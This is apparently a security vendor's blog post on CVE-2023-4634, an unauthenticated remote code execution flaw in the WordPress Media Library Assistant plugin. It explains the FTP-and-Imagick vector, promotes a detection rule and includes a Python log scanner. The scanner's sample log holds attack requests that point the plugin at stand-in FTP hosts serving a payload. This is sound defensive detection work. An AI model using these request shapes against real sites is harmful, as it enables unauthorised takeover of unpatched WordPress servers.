CVE-2023-4634 Detection: Unauthenticated RCE Vulnerability in WordPress Media Library Assistant Plugin

Security researchers have issued a stark warning about a critical vulnerability, designated as CVE-2023-4634, which is affecting an alarming number of over 70,000 WordPress sites globally. This vulnerability originates from a security flaw in the WordPress Media Library Assistant Plugin, an extremely popular and widely used plugin within the WordPress community. With this vulnerability already being exploited in the wild and the ready availability of a proof-of-concept exploit, the risk of attacks intensifying and spreading further throughout the WordPress ecosystem becomes even more concerning. 

Detect CVE-2023-4634 Exploitation Attempts

Proactive detection of vulnerability exploitation remains one of the top security use cases due to the ever-increasing number of CVEs impacting popular software, which poses severe challenges to organizations leveraging these products and requires attention from defenders. The newly discovered WordPress security bug tracked as CVE-2023-4634 is getting into the limelight with the PoC exploit publicly available on GitHub. SOC Prime provides defenders with the fastest feed of security news and empowers progressive organizations with the latest detection content to identify any traces of an attack in a timely manner.

To help security teams proactively detect CVE-2023-4634 exploitation attempts, SOC Prime Platform has recently released a novel Sigma rule in response to the escalating threats affecting WordPress users. Follow the link below to reach the dedicated Sigma rule written by our keen Threat Bounty developer Mustafa Gurkan KARAKAYA:

Potential Unauthenticated Remote Code Execution [CVE-2023-4634] Vulnerability Exploitation Attempt on WordPress Media Library Assistant (via webserver)

This Sigma rule detects possible unauthenticated RCE exploitation attempts against WordPress Media Library Assistant that deliver a malicious payload. The detection code can be instantly converted to 18 SIEM, EDR, XDR, and Data Lake technologies and is aligned with the MITRE ATT&CK® framework, addressing the Initial Access tactic and the Exploit Public-Facing Application technique (T1190) from its arsenal.

Aspiring Detection Engineers can sharpen their Sigma and ATT&CK skills by joining the crowdsourced Threat Bounty Program. Train your detection coding skills to advance in an engineering career while enriching collective industry expertise and earning financial rewards for your input.

To browse the entire collection of Sigma rules for CVE detection and dive into relevant threat intelligence, click the Explore Detections button below.


CVE-2023-4634 Analysis

Given WordPress’s widespread popularity as a content management system (CMS), with millions of websites relying on it worldwide, vulnerabilities like those in the Media Library Assistant Plugin pose a significant risk to organizations worldwide. Attackers might use compromised WordPress websites as an entry point to the organizational network proceeding with other malicious activities or use the affected site as a launching pad for malware distribution and phishing attacks.

The vulnerability in the limelight is an unauthenticated remote code execution (RCE) issue stemming from insufficient controls on file paths during image processing via Imagick. It enables adversaries to supply files via FTP, leading to local file inclusion and remote code execution. Under these conditions, an attacker could potentially take over any unpatched WordPress site.

The vulnerability affects Media Library Assistant plugin versions prior to 3.10 and requires a server with Imagick libraries installed to be exploited. A successful attack also requires Imagick to be running with its default configuration. Website administrators are urged to install the security patch from the WordPress dashboard as soon as possible.
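The Sigma rule above works on webserver telemetry. The following is an added illustration of the same idea as log-scanning logic, not the rule's own selectors or any code from SOC Prime or the plugin: it flags requests to the Media Library Assistant plugin directory whose query string carries an ftp:// location, the file-supply vector described above, and handles the double-URL-encoded variant. The plugin directory slug, the ENDPOINT-PLACEHOLDER.php script name and the `param` parameter in the constructed log lines are assumptions, since the article does not state the vulnerable endpoint.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" access-log prefix; enough for the constructed sample below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Assumed plugin directory (WordPress.org slug); the article names no script, so the
# check keys on the directory rather than on one endpoint.
PLUGIN_DIR = "/wp-content/plugins/media-library-assistant/"

def is_suspicious(line: str) -> tuple[bool, str]:
    """Flag requests that hit the plugin directory and pass an ftp:// location,
    the file-supply vector the write-up describes. Returns (verdict, reason)."""
    m = LOG_RE.match(line)
    if not m:
        return False, "unparsed line"
    parts = urlsplit(unquote(m.group("target")))
    if PLUGIN_DIR not in parts.path.lower():
        return False, "not a plugin request"
    # Decode a second time: double URL-encoding is a common evasion of naive filters.
    if "ftp://" in unquote(parts.query).lower():
        return True, "ftp:// supplied to Media Library Assistant endpoint"
    return False, "plugin request without ftp scheme"

def scan(lines):
    """Return [(client_ip, reason)] for every flagged line, in log order."""
    hits = []
    for line in lines:
        verdict, reason = is_suspicious(line)
        if verdict:
            hits.append((LOG_RE.match(line).group("ip"), reason))
    return hits

# Constructed sample log; ENDPOINT-PLACEHOLDER.php and "param" stand in for the
# real script and parameter names, which this article does not state.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2023:12:00:01 +0000] "GET /wp-content/plugins/'
    'media-library-assistant/includes/ENDPOINT-PLACEHOLDER.php?param=ftp%3A%2F%2F'
    '203.0.113.9%2Fpayload.png HTTP/1.1" 200 512 "-" "curl/8.0"',
    '192.0.2.10 - - [10/Sep/2023:12:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Sep/2023:12:00:03 +0000] "GET /wp-content/plugins/'
    'media-library-assistant/includes/ENDPOINT-PLACEHOLDER.php?param=thumb.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Sep/2023:12:00:04 +0000] "GET /wp-content/plugins/'
    'media-library-assistant/includes/ENDPOINT-PLACEHOLDER.php?param=FTP%253A%252F%252F'
    '198.51.100.8%252Fx.png HTTP/1.1" 500 0 "-" "python-requests/2.31"',
]
```

Treat a hit as a lead for triage rather than a confirmed compromise, and correlate it with the response status and with Imagick or PHP errors from the same host.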

The issue was discovered by security experts from Patrowl, who have already released a writeup describing the flaw along with a PoC to give an understanding of the risk level.

With the growing volumes of CVEs actively exploited in the wild, proactive detection of exploitation attempts is critical for organizations striving to boost their cyber resilience. SOC Prime equips security teams with Uncoder AI, a single IDE for Detection Engineering that enables them to write flawless detection code with less effort and automatically translate it to 64 query languages, using an all-in-one product that ensures complete privacy.
